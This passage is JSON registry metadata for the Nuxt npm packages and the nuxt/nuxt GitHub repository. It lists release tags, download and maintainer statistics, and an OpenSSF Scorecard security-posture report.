nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T16:00:17.618Z","dependent_packages_count":1704,"downloads":19028956,"downloads_period":"last-month","dependent_repos_count":7686,"rankings":{"downloads":0.1669207577765056,"dependent_repos_count":0.2765098142340737,"dependent_packages_count":0.04491216895498186,"stargazers_count":0.15559799533710655,"forks_count":0.5233980135042239,"docker_downloads_count":0.6781401091461025,"average":0.307579809825499},"purl":"pkg:npm/%40nuxt/kit","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/kit","docker_dependents_count":149,"docker_downloads_count":19484,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/kit","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/kit/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-28T04:26:11.019Z","issues_count":5861,"pull_requests_count":3395,"avg_time_to_close_issue":9340627.793787336,"avg_time_to_close_pull_request":863155.8930551027,"issues_closed_count":4164,"pull_requests_closed_count":3065,"pull_request_authors_count":451,"issue_authors_count":2654,"avg_comments_per_issue":5.084627196724108,"avg_comments_per_pull_request":2.100441826215022,"merged_pull_requests_count":2745,"bot_issues_count":1,"bot_pull_requests_count":1251,"past_year_issues_count":2729,"past_year_pull_requests_count":2319,"past_year_avg_time_to_close_issue":1473181.8854881267,"past_year_avg_time_to_close_pull_request":282402.1880301602,"past_year_issues_closed_count":1885,"past_year_pull_requests_closed_count":2120,"past_year_pull_request_authors_count":309,"past_year_issue_authors_count":1438,"past_year_avg_comments_per_issue":3.419567607182118,"past_year_avg_comments_per_pull_request":2.0685640362225097,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":943,"past_year_merged_pull_requests_count":1932,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":154,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fkit/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:27:08.772Z","updated_at":"2023-08-19T18:27:08.772Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2054329,"name":"nuxt3","ecosystem":"npm","description":"[![Nuxt banner](./.github/assets/banner.svg)](https://nuxt.com)","homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":null,"versions_count":2074,"first_release_published_at":"2020-09-21T09:40:09.622Z","latest_release_published_at":"2021-06-24T09:09:50.764Z","latest_release_number":"0.8.0","last_synced_at":"2026-02-13T22:18:12.753Z","created_at":"2022-04-09T20:11:10.494Z","updated_at":"2026-02-13T22:29:51.156Z","registry_url":"https://www.npmjs.com/package/nuxt3","install_command":"npm install nuxt3","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"3.8.0-28284309.b3d3d7f4","pr-20836":"3.6.0-28072625.2e2d8450","pr-20910":"3.5.1-28071980.657d1b01","pr-21066":"3.5.2-28084070.1bb05d83","pr-21450":"3.6.0-28124217.43844474","pr-19403":"3.6.0-28106934.bccf6dd0","pr-21461":"3.6.0-28107353.3fa5f90a","pr-21655":"3.6.0-28121506.bee3dde2","pr-21573":"3.6.0-28121201.45550c5f","pr-21705":"3.6.0-28125223.60c7ae2d","pr-21793":"3.6.3-28155682.16a8312f","pr-22224":"3.7.0-28163062.f38eafa6","pr-22227":"3.6.5-28163125.3d0d7508","pr-21747":"3.7.0-28179135.c12f0f09","pr-22362":"3.7.0-28179877.ea6d5c28","pr-21641":"3.8.0-28246590.5d47cf10","pr-22465":"3.7.0-28184377.9a30357e","pr-22494":"3.7.0-28185860.e8cb8914","pr-22515":"3.7.0-28197383.e0d6624f","pr-23526":"3.8.0-28275051.7cb8d079"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","ta